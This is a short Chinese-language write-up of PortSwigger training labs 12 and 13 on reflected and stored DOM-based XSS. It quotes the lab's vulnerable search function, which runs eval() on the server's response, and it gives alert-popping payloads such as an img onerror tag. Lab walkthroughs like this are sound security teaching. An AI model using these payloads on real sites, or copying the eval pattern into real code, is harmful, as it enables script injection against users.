portswigger靶场-Lab12、13

admin 2023年10月31日02:04:50评论13 views字数 964阅读3分12秒阅读模式

Lab 12)DOM反射xss(search函数中的eval执行json中的js

(Lab 13)DOM存储xsssearch函数中的eval执行json中的js


portswigger靶场-Lab12、13靶场地址:https://portswigger.net/web-security

实验12:反射DOM xss

1.靶场解析

(js代码解析如下:

function search(path) {

    var xhr = new XMLHttpRequest();

    xhr.onreadystatechange = function() {

        if (this.readyState == 4 && this.status == 200) {

            eval('var searchResultsObj = ' + this.responseText);

            displaySearchResults(searchResultsObj);

        }

    };


这段代码是一个JavaScript函数,名为`search`。它使用XMLHttpRequest对象来异步请求数据,然后在接收到响应后执行特定的操作。

输入payload 12313123时:

portswigger靶场-Lab12、13


=>


输入payload "-alert(1)}//时弹窗:

portswigger靶场-Lab12、13

portswigger靶场-Lab12、13


实验13:存储DOM xss

1.靶场解析

(js代码解析如下:

function search(path) {

    var xhr = new XMLHttpRequest();

    xhr.onreadystatechange = function() {

        if (this.readyState == 4 && this.status == 200) {

            eval('var searchResultsObj = ' + this.responseText);

            displaySearchResults(searchResultsObj);

        }

    };


这段代码是一个JavaScript函数,名为`search`。它使用XMLHttpRequest对象来异步请求数据,然后在接收到响应后执行特定的操作。

输入payload 11111时:

portswigger靶场-Lab12、13


=>


输入payload <><img src=1 onerror=alert(1)>时弹窗:

portswigger靶场-Lab12、13


原文始发于微信公众号(鲲哥的Bypass之旅):portswigger靶场-Lab12、13

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日02:04:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   portswigger靶场-Lab12、13https://cn-sec.com/archives/2159022.html

发表评论

匿名网友 填写信息